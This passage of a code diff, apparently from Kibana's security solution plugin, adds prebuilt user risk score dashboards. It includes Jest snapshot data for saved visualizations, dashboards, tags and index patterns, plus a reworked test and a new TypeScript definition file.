Hits\\",\\"emptyAsNull\\":false},\\"schema\\":\\"metric\\"},{\\"id\\":\\"3\\",\\"enabled\\":true,\\"type\\":\\"terms\\",\\"params\\":{\\"field\\":\\"user.name\\",\\"orderBy\\":\\"2\\",\\"order\\":\\"desc\\",\\"size\\":20,\\"otherBucket\\":false,\\"otherBucketLabel\\":\\"Other\\",\\"missingBucket\\":false,\\"missingBucketLabel\\":\\"Missing\\",\\"customLabel\\":\\"User\\"},\\"schema\\":\\"split\\"},{\\"id\\":\\"4\\",\\"enabled\\":true,\\"type\\":\\"terms\\",\\"params\\":{\\"field\\":\\"signal.rule.name\\",\\"orderBy\\":\\"2\\",\\"order\\":\\"desc\\",\\"size\\":50,\\"otherBucket\\":false,\\"otherBucketLabel\\":\\"Other\\",\\"missingBucket\\":false,\\"missingBucketLabel\\":\\"Missing\\",\\"customLabel\\":\\"Rule Name\\"},\\"schema\\":\\"bucket\\"},{\\"id\\":\\"5\\",\\"enabled\\":true,\\"type\\":\\"terms\\",\\"params\\":{\\"field\\":\\"signal.rule.type\\",\\"orderBy\\":\\"2\\",\\"order\\":\\"desc\\",\\"size\\":50,\\"otherBucket\\":false,\\"otherBucketLabel\\":\\"Other\\",\\"missingBucket\\":false,\\"missingBucketLabel\\":\\"Missing\\",\\"customLabel\\":\\"Rule Type\\"},\\"schema\\":\\"bucket\\"}],\\"params\\":{\\"perPage\\":25,\\"showPartialRows\\":false,\\"showMetricsAtAllLevels\\":false,\\"showTotal\\":false,\\"showToolbar\\":false,\\"totalFunc\\":\\"sum\\",\\"percentageCol\\":\\"\\",\\"row\\":true,\\"autoFitRowToContent\\":true}}", + }, + "coreMigrationVersion": "8.3.0", + "id": "a62d3ed0-cf92-11eb-a0ff-1763d16cbda7", + "migrationVersion": Object { + "visualization": "8.3.0", + }, + "references": Array [ + Object { + "id": "siem-signals-default-index-pattern", + "name": "kibanaSavedObjectMeta.searchSourceJSON.index", + "type": "index-pattern", + }, + ], + "type": "visualization", + "updated_at": "2022-06-22T22:01:24.771Z", + }, + Object { + "attributes": Object { + "description": "", + "kibanaSavedObjectMeta": Object { + "searchSourceJSON": "{\\"query\\":{\\"query\\":\\"\\",\\"language\\":\\"kuery\\"},\\"filter\\":[],\\"indexRefName\\":\\"kibanaSavedObjectMeta.searchSourceJSON.index\\"}", + }, + "title": "Alerts by Hostname", + "uiStateJSON": "{}", + "version": 1, + "visState": "{\\"title\\":\\"Host Risk Score (Rule Breakdown)\\",\\"type\\":\\"table\\",\\"aggs\\":[{\\"id\\":\\"2\\",\\"enabled\\":true,\\"type\\":\\"sum\\",\\"params\\":{\\"field\\":\\"signal.rule.risk_score\\",\\"customLabel\\":\\"Total Risk Score\\"},\\"schema\\":\\"metric\\"},{\\"id\\":\\"1\\",\\"enabled\\":true,\\"type\\":\\"count\\",\\"params\\":{\\"customLabel\\":\\"Number of Hits\\"},\\"schema\\":\\"metric\\"},{\\"id\\":\\"3\\",\\"enabled\\":true,\\"type\\":\\"terms\\",\\"params\\":{\\"field\\":\\"host.name\\",\\"orderBy\\":\\"2\\",\\"order\\":\\"desc\\",\\"size\\":20,\\"otherBucket\\":false,\\"otherBucketLabel\\":\\"Other\\",\\"missingBucket\\":false,\\"missingBucketLabel\\":\\"Missing\\",\\"customLabel\\":\\"Host\\"},\\"schema\\":\\"split\\"},{\\"id\\":\\"4\\",\\"enabled\\":true,\\"type\\":\\"terms\\",\\"params\\":{\\"field\\":\\"signal.rule.name\\",\\"orderBy\\":\\"2\\",\\"order\\":\\"desc\\",\\"size\\":20,\\"otherBucket\\":false,\\"otherBucketLabel\\":\\"Other\\",\\"missingBucket\\":false,\\"missingBucketLabel\\":\\"Missing\\",\\"customLabel\\":\\"Rule Name\\"},\\"schema\\":\\"bucket\\"},{\\"id\\":\\"5\\",\\"enabled\\":true,\\"type\\":\\"terms\\",\\"params\\":{\\"field\\":\\"signal.rule.type\\",\\"orderBy\\":\\"2\\",\\"order\\":\\"desc\\",\\"size\\":20,\\"otherBucket\\":false,\\"otherBucketLabel\\":\\"Other\\",\\"missingBucket\\":false,\\"missingBucketLabel\\":\\"Missing\\",\\"customLabel\\":\\"Rule Type\\"},\\"schema\\":\\"bucket\\"}],\\"params\\":{\\"perPage\\":10,\\"showPartialRows\\":false,\\"showMetricsAtAllLevels\\":false,\\"showTotal\\":false,\\"showToolbar\\":false,\\"totalFunc\\":\\"sum\\",\\"percentageCol\\":\\"\\",\\"row\\":true}}", + }, + "coreMigrationVersion": "8.3.0", + "id": "42371d00-cf7a-11eb-9a96-05d89f94ad96", + "migrationVersion": Object { + "visualization": "8.3.0", + }, + "references": Array [ + Object { + "id": "siem-signals-default-index-pattern", + "name": "kibanaSavedObjectMeta.searchSourceJSON.index", + "type": "index-pattern", + }, + ], + "type": "visualization", + "updated_at": "2022-06-22T21:55:25.560Z", + }, + Object { + "attributes": Object { + "description": "", + "kibanaSavedObjectMeta": Object { + "searchSourceJSON": "{\\"query\\":{\\"query\\":\\"not user.name : *$\\",\\"language\\":\\"kuery\\"},\\"filter\\":[],\\"indexRefName\\":\\"kibanaSavedObjectMeta.searchSourceJSON.index\\"}", + }, + "title": "User Risk Score (Tactic Breakdown)- Verbose", + "uiStateJSON": "{}", + "version": 1, + "visState": "{\\"title\\":\\"User Risk Score (Tactic Breakdown)- Verbose\\",\\"type\\":\\"table\\",\\"aggs\\":[{\\"id\\":\\"1\\",\\"enabled\\":true,\\"type\\":\\"sum\\",\\"params\\":{\\"field\\":\\"signal.rule.risk_score\\",\\"customLabel\\":\\"Total Risk Score\\"},\\"schema\\":\\"metric\\"},{\\"id\\":\\"3\\",\\"enabled\\":true,\\"type\\":\\"terms\\",\\"params\\":{\\"field\\":\\"user.name\\",\\"orderBy\\":\\"1\\",\\"order\\":\\"desc\\",\\"size\\":40,\\"otherBucket\\":false,\\"otherBucketLabel\\":\\"Other\\",\\"missingBucket\\":false,\\"missingBucketLabel\\":\\"Missing\\",\\"customLabel\\":\\"Username\\"},\\"schema\\":\\"split\\"},{\\"id\\":\\"5\\",\\"enabled\\":true,\\"type\\":\\"terms\\",\\"params\\":{\\"field\\":\\"signal.rule.threat.tactic.name\\",\\"orderBy\\":\\"1\\",\\"order\\":\\"desc\\",\\"size\\":100,\\"otherBucket\\":false,\\"otherBucketLabel\\":\\"Other\\",\\"missingBucket\\":true,\\"missingBucketLabel\\":\\"Other\\",\\"customLabel\\":\\"Tactic\\"},\\"schema\\":\\"bucket\\"},{\\"id\\":\\"6\\",\\"enabled\\":true,\\"type\\":\\"terms\\",\\"params\\":{\\"field\\":\\"signal.rule.threat.technique.name\\",\\"orderBy\\":\\"1\\",\\"order\\":\\"desc\\",\\"size\\":100,\\"otherBucket\\":false,\\"otherBucketLabel\\":\\"Other\\",\\"missingBucket\\":true,\\"missingBucketLabel\\":\\"Other\\",\\"customLabel\\":\\"Technique\\"},\\"schema\\":\\"bucket\\"},{\\"id\\":\\"7\\",\\"enabled\\":true,\\"type\\":\\"count\\",\\"params\\":{\\"customLabel\\":\\"Number of Hits\\"},\\"schema\\":\\"metric\\"}],\\"params\\":{\\"perPage\\":10,\\"showPartialRows\\":false,\\"showMetricsAtAllLevels\\":false,\\"showTotal\\":false,\\"showToolbar\\":false,\\"totalFunc\\":\\"sum\\",\\"percentageCol\\":\\"\\",\\"row\\":true,\\"autoFitRowToContent\\":false}}", + }, + "coreMigrationVersion": "8.3.0", + "id": "183d32f0-9a5e-11ec-90d3-1109ed409ab5", + "migrationVersion": Object { + "visualization": "8.3.0", + }, + "references": Array [ + Object { + "id": "siem-signals-default-index-pattern", + "name": "kibanaSavedObjectMeta.searchSourceJSON.index", + "type": "index-pattern", + }, + ], + "type": "visualization", + "updated_at": "2022-06-22T21:55:25.560Z", + }, + Object { + "attributes": Object { + "color": "#D36086", + "description": "", + "name": "experimental", + }, + "coreMigrationVersion": "8.3.0", + "id": "1d00ebe0-f3b2-11eb-beb2-b91666445a94", + "migrationVersion": Object { + "tag": "8.0.0", + }, + "references": Array [], + "type": "tag", + "updated_at": "2022-06-22T21:55:25.560Z", + }, + Object { + "attributes": Object { + "color": "#8aa96b", + "description": "", + "name": "release", + }, + "coreMigrationVersion": "8.3.0", + "id": "2d22b2c0-feb0-11eb-bac9-4d64e825480b", + "migrationVersion": Object { + "tag": "8.0.0", + }, + "references": Array [], + "type": "tag", + "updated_at": "2022-06-22T21:55:25.560Z", + }, + Object { + "attributes": Object { + "description": "This dashboard allows users to drill down further into the details of the risk components associated with a particular user.", + "hits": 0, + "kibanaSavedObjectMeta": Object { + "searchSourceJSON": "{\\"query\\":{\\"query\\":\\"\\",\\"language\\":\\"kuery\\"},\\"filter\\":[]}", + }, + "optionsJSON": "{\\"hidePanelTitles\\":false,\\"useMargins\\":true}", + "panelsJSON": "[{\\"version\\":\\"8.3.0\\",\\"type\\":\\"visualization\\",\\"gridData\\":{\\"x\\":0,\\"y\\":0,\\"w\\":48,\\"h\\":3,\\"i\\":\\"eaa57cf4-7ca3-4919-ab76-dbac0eb6a195\\"},\\"panelIndex\\":\\"eaa57cf4-7ca3-4919-ab76-dbac0eb6a195\\",\\"embeddableConfig\\":{\\"savedVis\\":{\\"title\\":\\"\\",\\"description\\":\\"\\",\\"type\\":\\"markdown\\",\\"params\\":{\\"fontSize\\":12,\\"openLinksInNewTab\\":false,\\"markdown\\":\\"The User Risk Score capability is an experimental feature. You can read further about it [here]\\"},\\"uiState\\":{},\\"data\\":{\\"aggs\\":[],\\"searchSource\\":{\\"query\\":{\\"query\\":\\"\\",\\"language\\":\\"kuery\\"},\\"filter\\":[]}}},\\"hidePanelTitles\\":true,\\"enhancements\\":{},\\"type\\":\\"visualization\\"}},{\\"version\\":\\"8.0.0\\",\\"type\\":\\"lens\\",\\"gridData\\":{\\"x\\":0,\\"y\\":3,\\"w\\":48,\\"h\\":15,\\"i\\":\\"b3fdccab-59c1-47c8-9393-fa043e0dff83\\"},\\"panelIndex\\":\\"b3fdccab-59c1-47c8-9393-fa043e0dff83\\",\\"embeddableConfig\\":{\\"enhancements\\":{}},\\"panelRefName\\":\\"panel_b3fdccab-59c1-47c8-9393-fa043e0dff83\\"},{\\"version\\":\\"8.0.0\\",\\"type\\":\\"visualization\\",\\"gridData\\":{\\"x\\":0,\\"y\\":18,\\"w\\":26,\\"h\\":65,\\"i\\":\\"8d09b97c-a023-4b7e-9e9d-1c46e726a487\\"},\\"panelIndex\\":\\"8d09b97c-a023-4b7e-9e9d-1c46e726a487\\",\\"embeddableConfig\\":{\\"enhancements\\":{\\"dynamicActions\\":{\\"events\\":[{\\"eventId\\":\\"593ff0e6-25da-47ad-b81d-9a0106c0e9aa\\",\\"triggers\\":[\\"VALUE_CLICK_TRIGGER\\"],\\"action\\":{\\"factoryId\\":\\"URL_DRILLDOWN\\",\\"name\\":\\"Go to User View\\",\\"config\\":{\\"url\\":{\\"template\\":\\"{{kibanaUrl}}/app/security/hosts/{{context.panel.filters.[0].meta.params.query}}\\"},\\"openInNewTab\\":true,\\"encodeUrl\\":true}}}]}},\\"hidePanelTitles\\":false,\\"vis\\":{\\"params\\":{\\"colWidth\\":[{\\"colIndex\\":0,\\"width\\":410.5}]}}},\\"title\\":\\"Alert Counts by User\\",\\"panelRefName\\":\\"panel_8d09b97c-a023-4b7e-9e9d-1c46e726a487\\"},{\\"version\\":\\"8.0.0\\",\\"type\\":\\"visualization\\",\\"gridData\\":{\\"x\\":26,\\"y\\":18,\\"w\\":22,\\"h\\":65,\\"i\\":\\"cae82aa1-20c8-4354-94ab-3934ac53b8fe\\"},\\"panelIndex\\":\\"cae82aa1-20c8-4354-94ab-3934ac53b8fe\\",\\"embeddableConfig\\":{\\"enhancements\\":{\\"dynamicActions\\":{\\"events\\":[{\\"eventId\\":\\"0fd43778-bd5d-4b2b-85c3-47ac3b756434\\",\\"triggers\\":[\\"VALUE_CLICK_TRIGGER\\"],\\"action\\":{\\"factoryId\\":\\"URL_DRILLDOWN\\",\\"name\\":\\"Go to User View\\",\\"config\\":{\\"url\\":{\\"template\\":\\"{{kibanaUrl}}/app/security/hosts/{{context.panel.filters.[0].meta.params.query}}\\"},\\"openInNewTab\\":true,\\"encodeUrl\\":true}}}]}},\\"hidePanelTitles\\":false,\\"vis\\":{\\"params\\":{\\"colWidth\\":[{\\"colIndex\\":0,\\"width\\":304}]}}},\\"title\\":\\"Alert Counts by Host\\",\\"panelRefName\\":\\"panel_cae82aa1-20c8-4354-94ab-3934ac53b8fe\\"},{\\"version\\":\\"8.0.0\\",\\"type\\":\\"visualization\\",\\"gridData\\":{\\"x\\":0,\\"y\\":83,\\"w\\":48,\\"h\\":15,\\"i\\":\\"ca3c8903-be5d-4265-820c-cc3d67443af2\\"},\\"panelIndex\\":\\"ca3c8903-be5d-4265-820c-cc3d67443af2\\",\\"embeddableConfig\\":{\\"enhancements\\":{}},\\"panelRefName\\":\\"panel_ca3c8903-be5d-4265-820c-cc3d67443af2\\"}]", + "timeRestore": false, + "title": "Drilldown of User Risk Score", + "version": 1, + }, + "coreMigrationVersion": "8.3.0", + "id": "1355b030-ca2b-11ec-962f-a3a018b7d10f", + "migrationVersion": Object { + "dashboard": "8.3.0", + }, + "references": Array [ + Object { + "id": "60454070-9a5d-11ec-9633-5f782d122340", + "name": "b3fdccab-59c1-47c8-9393-fa043e0dff83:panel_b3fdccab-59c1-47c8-9393-fa043e0dff83", + "type": "lens", + }, + Object { + "id": "a62d3ed0-cf92-11eb-a0ff-1763d16cbda7", + "name": "8d09b97c-a023-4b7e-9e9d-1c46e726a487:panel_8d09b97c-a023-4b7e-9e9d-1c46e726a487", + "type": "visualization", + }, + Object { + "id": "42371d00-cf7a-11eb-9a96-05d89f94ad96", + "name": "cae82aa1-20c8-4354-94ab-3934ac53b8fe:panel_cae82aa1-20c8-4354-94ab-3934ac53b8fe", + "type": "visualization", + }, + Object { + "id": "183d32f0-9a5e-11ec-90d3-1109ed409ab5", + "name": "ca3c8903-be5d-4265-820c-cc3d67443af2:panel_ca3c8903-be5d-4265-820c-cc3d67443af2", + "type": "visualization", + }, + Object { + "id": "1d00ebe0-f3b2-11eb-beb2-b91666445a94", + "name": "tag-1d00ebe0-f3b2-11eb-beb2-b91666445a94", + "type": "tag", + }, + Object { + "id": "14104360-2534-11ec-ad40-03fece8605c9", + "name": "tag-14104360-2534-11ec-ad40-03fece8605c9", + "type": "tag", + }, + Object { + "id": "2d22b2c0-feb0-11eb-bac9-4d64e825480b", + "name": "tag-2d22b2c0-feb0-11eb-bac9-4d64e825480b", + "type": "tag", + }, + ], + "type": "dashboard", + "updated_at": "2022-06-22T21:55:26.622Z", + }, + Object { + "attributes": Object { + "fieldAttrs": "{}", + "fields": "[]", + "runtimeFieldMap": "{}", + "timeFieldName": "@timestamp", + "title": ".siem-signals-default", + "typeMeta": "{}", + }, + "coreMigrationVersion": "8.3.0", + "id": "6a98e860-f264-11ec-b875-8dd104de3c0f", + "migrationVersion": Object { + "index-pattern": "8.0.0", + }, + "references": Array [], + "type": "index-pattern", + "updated_at": "2022-06-22T19:49:24.075Z", + }, + Object { + "attributes": Object { + "fieldAttrs": "{\\"user.name\\":{\\"count\\":1}}", + "fields": "[]", + "runtimeFieldMap": "{}", + "timeFieldName": "@timestamp", + "title": "ml_user_risk_score_latest_default", + "typeMeta": "{}", + }, + "coreMigrationVersion": "8.3.0", + "id": "0edd6710-cfd4-11ec-962f-a3a018b7d10f", + "migrationVersion": Object { + "index-pattern": "8.0.0", + }, + "references": Array [], + "type": "index-pattern", + "updated_at": "2022-06-22T21:55:25.560Z", + }, + Object { + "attributes": Object { + "description": "", + "state": Object { + "datasourceStates": Object { + "indexpattern": Object { + "layers": Object { + "4fd27c60-031c-4cd6-9cc3-42eba11e4dc5": Object { + "columnOrder": Array [ + "a56deeb6-7001-42a3-80bf-d0d4cd389864", + "f78c300e-883b-469b-bc12-c1bd1a3567c9", + "d54be677-903e-45f4-8218-8e21fbcc692e", + ], + "columns": Object { + "a56deeb6-7001-42a3-80bf-d0d4cd389864": Object { + "dataType": "string", + "isBucketed": true, + "label": "Top values of user.name", + "operationType": "terms", + "params": Object { + "missingBucket": false, + "orderBy": Object { + "columnId": "d54be677-903e-45f4-8218-8e21fbcc692e", + "type": "column", + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": Object { + "id": "terms", + }, + "size": 100, + }, + "scale": "ordinal", + "sourceField": "user.name", + }, + "d54be677-903e-45f4-8218-8e21fbcc692e": Object { + "dataType": "number", + "isBucketed": false, + "label": "Sum of risk_stats.risk_score", + "operationType": "sum", + "scale": "ratio", + "sourceField": "risk_stats.risk_score", + }, + "f78c300e-883b-469b-bc12-c1bd1a3567c9": Object { + "dataType": "string", + "isBucketed": true, + "label": "Top values of risk.keyword", + "operationType": "terms", + "params": Object { + "missingBucket": false, + "orderBy": Object { + "columnId": "d54be677-903e-45f4-8218-8e21fbcc692e", + "type": "column", + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": Object { + "id": "terms", + }, + "size": 3, + }, + "scale": "ordinal", + "sourceField": "risk.keyword", + }, + }, + "incompleteColumns": Object {}, + }, + }, + }, + }, + "filters": Array [ + Object { + "$state": Object { + "store": "appState", + }, + "meta": Object { + "alias": null, + "disabled": false, + "index": "915f434c-c7d6-4813-be8a-620ce7b2bfab", + "key": "risk.keyword", + "negate": true, + "params": Object { + "query": "Unknown", + }, + "type": "phrase", + }, + "query": Object { + "match_phrase": Object { + "risk.keyword": "Unknown", + }, + }, + }, + ], + "query": Object { + "language": "kuery", + "query": "", + }, + "visualization": Object { + "columns": Array [ + Object { + "columnId": "a56deeb6-7001-42a3-80bf-d0d4cd389864", + "isTransposed": false, + }, + Object { + "columnId": "f78c300e-883b-469b-bc12-c1bd1a3567c9", + "isTransposed": false, + }, + Object { + "columnId": "d54be677-903e-45f4-8218-8e21fbcc692e", + "hidden": true, + "isTransposed": false, + }, + ], + "layerId": "4fd27c60-031c-4cd6-9cc3-42eba11e4dc5", + "layerType": "data", + "rowHeight": "single", + "rowHeightLines": 1, + }, + }, + "title": "Current Risk Score For Users", + "visualizationType": "lnsDatatable", + }, + "coreMigrationVersion": "8.3.0", + "id": "3b1fd7f0-d52d-11ec-b370-e3adc339bc8c", + "migrationVersion": Object { + "lens": "8.3.0", + }, + "references": Array [ + Object { + "id": "0edd6710-cfd4-11ec-962f-a3a018b7d10f", + "name": "indexpattern-datasource-layer-4fd27c60-031c-4cd6-9cc3-42eba11e4dc5", + "type": "index-pattern", + }, + Object { + "id": "0edd6710-cfd4-11ec-962f-a3a018b7d10f", + "name": "915f434c-c7d6-4813-be8a-620ce7b2bfab", + "type": "index-pattern", + }, + Object { + "id": "14104360-2534-11ec-ad40-03fece8605c9", + "name": "tag-ref-14104360-2534-11ec-ad40-03fece8605c9", + "type": "tag", + }, + ], + "type": "lens", + "updated_at": "2022-06-22T22:07:54.553Z", + }, + Object { + "attributes": Object { + "description": "", + "hits": 0, + "kibanaSavedObjectMeta": Object { + "searchSourceJSON": "{\\"query\\":{\\"query\\":\\"\\",\\"language\\":\\"kuery\\"},\\"filter\\":[{\\"meta\\":{\\"negate\\":true,\\"type\\":\\"phrase\\",\\"key\\":\\"risk.keyword\\",\\"params\\":{\\"query\\":\\"Unknown\\"},\\"disabled\\":true,\\"alias\\":null,\\"indexRefName\\":\\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\\"},\\"query\\":{\\"match_phrase\\":{\\"risk.keyword\\":\\"Unknown\\"}},\\"$state\\":{\\"store\\":\\"appState\\"}}]}", + }, + "optionsJSON": "{\\"useMargins\\":true,\\"syncColors\\":false,\\"hidePanelTitles\\":false}", + "panelsJSON": "[{\\"version\\":\\"8.0.0\\",\\"type\\":\\"lens\\",\\"gridData\\":{\\"x\\":11,\\"y\\":0,\\"w\\":25,\\"h\\":32,\\"i\\":\\"359e8a84-bc4a-4c1d-ab11-5fc73f6769a6\\"},\\"panelIndex\\":\\"359e8a84-bc4a-4c1d-ab11-5fc73f6769a6\\",\\"embeddableConfig\\":{\\"enhancements\\":{\\"dynamicActions\\":{\\"events\\":[{\\"eventId\\":\\"299d13ec-93f5-48ce-a98d-cf7aeeca37d6\\",\\"triggers\\":[\\"FILTER_TRIGGER\\"],\\"action\\":{\\"factoryId\\":\\"DASHBOARD_TO_DASHBOARD_DRILLDOWN\\",\\"name\\":\\"Go to Dashboard\\",\\"config\\":{\\"useCurrentFilters\\":true,\\"useCurrentDateRange\\":true}}}]}}},\\"panelRefName\\":\\"panel_359e8a84-bc4a-4c1d-ab11-5fc73f6769a6\\"}]", + "timeRestore": false, + "title": "Current Risk Score For Users", + "version": 1, + }, + "coreMigrationVersion": "8.3.0", + "id": "065c6df0-d530-11ec-b370-e3adc339bc8c", + "migrationVersion": Object { + "dashboard": "8.3.0", + }, + "references": Array [ + Object { + "id": "6a98e860-f264-11ec-b875-8dd104de3c0f", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern", + }, + Object { + "id": "3b1fd7f0-d52d-11ec-b370-e3adc339bc8c", + "name": "359e8a84-bc4a-4c1d-ab11-5fc73f6769a6:panel_359e8a84-bc4a-4c1d-ab11-5fc73f6769a6", + "type": "lens", + }, + Object { + "id": "1355b030-ca2b-11ec-962f-a3a018b7d10f", + "name": "359e8a84-bc4a-4c1d-ab11-5fc73f6769a6:drilldown:DASHBOARD_TO_DASHBOARD_DRILLDOWN:299d13ec-93f5-48ce-a98d-cf7aeeca37d6:dashboardId", + "type": "dashboard", + }, + Object { + "id": "1d00ebe0-f3b2-11eb-beb2-b91666445a94", + "name": "tag-1d00ebe0-f3b2-11eb-beb2-b91666445a94", + "type": "tag", + }, + Object { + "id": "14104360-2534-11ec-ad40-03fece8605c9", + "name": "tag-14104360-2534-11ec-ad40-03fece8605c9", + "type": "tag", + }, + Object { + "id": "2d22b2c0-feb0-11eb-bac9-4d64e825480b", + "name": "tag-2d22b2c0-feb0-11eb-bac9-4d64e825480b", + "type": "tag", + }, + ], + "type": "dashboard", + "updated_at": "2022-06-22T21:55:26.622Z", + }, +] +`; diff --git a/x-pack/plugins/security_solution/server/lib/prebuilt_saved_objects/routes/create_prebuilt_saved_objects.test.ts b/x-pack/plugins/security_solution/server/lib/prebuilt_saved_objects/routes/create_prebuilt_saved_objects.test.ts index 3c111c45b1621..caeae258f5070 100644 --- a/x-pack/plugins/security_solution/server/lib/prebuilt_saved_objects/routes/create_prebuilt_saved_objects.test.ts +++ b/x-pack/plugins/security_solution/server/lib/prebuilt_saved_objects/routes/create_prebuilt_saved_objects.test.ts @@ -13,7 +13,6 @@ import { requestMock, } from '../../detection_engine/routes/__mocks__'; import { getEmptySavedObjectsResponse } from '../../detection_engine/routes/__mocks__/request_responses'; -import { expectedSavedObjectTemplate } from '../mocks'; import { createPrebuiltSavedObjectsRoute } from './create_prebuilt_saved_objects'; const createPrebuiltSavedObjectsRequest = (savedObjectTemplate: string) => @@ -47,16 +46,18 @@ describe('createPrebuiltSavedObjects', () => { createPrebuiltSavedObjectsRoute(server.router, securitySetup); }); - test('should create saved objects from given template', async () => { - const response = await server.inject( - createPrebuiltSavedObjectsRequest('hostRiskScoreDashboards'), - requestContextMock.convertContext(context) - ); - - expect(clients.savedObjectsClient.bulkCreate).toHaveBeenCalledWith( - expectedSavedObjectTemplate, - { overwrite: true } - ); - expect(response.status).toEqual(200); - }); + it.each([['hostRiskScoreDashboards', 'userRiskScoreDashboards']])( + 'should create saved objects from given template - %p', + async () => { + const response = await server.inject( + createPrebuiltSavedObjectsRequest('userRiskScoreDashboards'), + requestContextMock.convertContext(context) + ); + + expect(clients.savedObjectsClient.bulkCreate.mock.calls[0][1]).toEqual({ overwrite: true }); + expect(clients.savedObjectsClient.bulkCreate.mock.calls[0][0]).toMatchSnapshot(); + + expect(response.status).toEqual(200); + } + ); }); diff --git a/x-pack/plugins/security_solution/server/lib/prebuilt_saved_objects/saved_object/index.ts b/x-pack/plugins/security_solution/server/lib/prebuilt_saved_objects/saved_object/index.ts index c4ed59354c720..54fb29df07ec9 100644 --- a/x-pack/plugins/security_solution/server/lib/prebuilt_saved_objects/saved_object/index.ts +++ b/x-pack/plugins/security_solution/server/lib/prebuilt_saved_objects/saved_object/index.ts @@ -5,3 +5,4 @@ * 2.0. */ export { hostRiskScoreDashboards } from './host_risk_score_dashboards'; +export { userRiskScoreDashboards } from './user_risk_score_dashboards'; diff --git a/x-pack/plugins/security_solution/server/lib/prebuilt_saved_objects/saved_object/user_risk_score_dashboards.ts b/x-pack/plugins/security_solution/server/lib/prebuilt_saved_objects/saved_object/user_risk_score_dashboards.ts new file mode 100644 index 0000000000000..0b72f1d3e7698 --- /dev/null +++ b/x-pack/plugins/security_solution/server/lib/prebuilt_saved_objects/saved_object/user_risk_score_dashboards.ts @@ -0,0 +1,528 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ +import type { SavedObject } from '@kbn/core/types'; + +export const userRiskScoreDashboards: SavedObject[] = [ + { + attributes: { + fieldAttrs: + '{"kibana.alert.rule.name":{"count":2},"signal.rule.name":{"count":2},"signal.rule.risk_score":{"count":2},"signal.rule.type":{"count":1},"host.os.family":{"count":1},"host.os.full":{"count":1},"host.os.name":{"count":1},"host.os.platform":{"count":1},"host.os.version":{"count":1},"signal.rule.rule_id":{"count":2},"signal.rule.threat.tactic.id":{"count":2},"host.id":{"count":1},"host.name":{"count":1}}', + fields: '[]', + runtimeFieldMap: '{}', + timeFieldName: '@timestamp', + title: '.siem-signals-', + typeMeta: '{}', + }, + coreMigrationVersion: '8.3.0', + id: 'd3ae2f80-fbc1-11eb-bac9-4d64e825480b', + migrationVersion: { 'index-pattern': '8.0.0' }, + references: [], + type: 'index-pattern', + updated_at: '2022-06-22T21:55:25.560Z', + }, + { + attributes: { color: '#32057a', description: '', name: 'ueba' }, + coreMigrationVersion: '8.3.0', + id: '14104360-2534-11ec-ad40-03fece8605c9', + migrationVersion: { tag: '8.0.0' }, + references: [], + type: 'tag', + updated_at: '2022-06-22T21:55:25.560Z', + }, + { + attributes: { + description: '', + state: { + datasourceStates: { + indexpattern: { + layers: { + 'b885eaad-3c68-49ad-9891-70158d912dbd': { + columnOrder: [ + '1fced52d-7ba5-4254-8656-fe0d7ced586a', + 'e82aed80-ee04-4ad1-9b9d-fde4a25be58a', + '1d9b32cd-62d9-44e5-bf43-109011adc714', + '1d9b32cd-62d9-44e5-bf43-109011adc714X0', + '1d9b32cd-62d9-44e5-bf43-109011adc714X1', + ], + columns: { + '1d9b32cd-62d9-44e5-bf43-109011adc714': { + dataType: 'number', + isBucketed: false, + label: 'cumulative_sum(sum(signal.rule.risk_score))', + operationType: 'formula', + params: { + formula: 'cumulative_sum(sum(signal.rule.risk_score))', + isFormulaBroken: false, + }, + references: ['1d9b32cd-62d9-44e5-bf43-109011adc714X1'], + scale: 'ratio', + }, + '1d9b32cd-62d9-44e5-bf43-109011adc714X0': { + customLabel: true, + dataType: 'number', + isBucketed: false, + label: 'Part of cumulative_sum(sum(signal.rule.risk_score))', + operationType: 'sum', + params: { emptyAsNull: false }, + scale: 'ratio', + sourceField: 'signal.rule.risk_score', + }, + '1d9b32cd-62d9-44e5-bf43-109011adc714X1': { + customLabel: true, + dataType: 'number', + isBucketed: false, + label: 'Part of cumulative_sum(sum(signal.rule.risk_score))', + operationType: 'cumulative_sum', + references: ['1d9b32cd-62d9-44e5-bf43-109011adc714X0'], + scale: 'ratio', + }, + '1fced52d-7ba5-4254-8656-fe0d7ced586a': { + dataType: 'string', + isBucketed: true, + label: 'Top 30 values of user.name', + operationType: 'terms', + params: { + missingBucket: false, + orderBy: { fallback: true, type: 'alphabetical' }, + orderDirection: 'asc', + otherBucket: false, + parentFormat: { id: 'terms' }, + size: 30, + }, + scale: 'ordinal', + sourceField: 'user.name', + }, + 'e82aed80-ee04-4ad1-9b9d-fde4a25be58a': { + dataType: 'date', + isBucketed: true, + label: '@timestamp', + operationType: 'date_histogram', + params: { includeEmptyRows: true, interval: '1d' }, + scale: 'interval', + sourceField: '@timestamp', + }, + }, + incompleteColumns: {}, + }, + }, + }, + }, + filters: [], + query: { language: 'kuery', query: 'not user.name: SYSTEM' }, + visualization: { + layers: [ + { + accessors: ['1d9b32cd-62d9-44e5-bf43-109011adc714'], + layerId: 'b885eaad-3c68-49ad-9891-70158d912dbd', + layerType: 'data', + position: 'top', + seriesType: 'bar_stacked', + showGridlines: false, + splitAccessor: '1fced52d-7ba5-4254-8656-fe0d7ced586a', + xAccessor: 'e82aed80-ee04-4ad1-9b9d-fde4a25be58a', + }, + ], + legend: { isVisible: true, legendSize: 'auto', position: 'right' }, + preferredSeriesType: 'bar_stacked', + title: 'Empty XY chart', + valueLabels: 'hide', + yLeftExtent: { mode: 'full' }, + yRightExtent: { mode: 'full' }, + }, + }, + title: 'User Risk Score (Max Risk Score Histogram)', + visualizationType: 'lnsXY', + }, + coreMigrationVersion: '8.3.0', + id: '60454070-9a5d-11ec-9633-5f782d122340', + migrationVersion: { lens: '8.3.0' }, + references: [ + { + id: 'd3ae2f80-fbc1-11eb-bac9-4d64e825480b', + name: 'indexpattern-datasource-layer-b885eaad-3c68-49ad-9891-70158d912dbd', + type: 'index-pattern', + }, + { + id: '14104360-2534-11ec-ad40-03fece8605c9', + name: 'tag-ref-14104360-2534-11ec-ad40-03fece8605c9', + type: 'tag', + }, + ], + type: 'lens', + updated_at: '2022-06-22T22:06:12.160Z', + }, + { + attributes: { + fieldAttrs: + 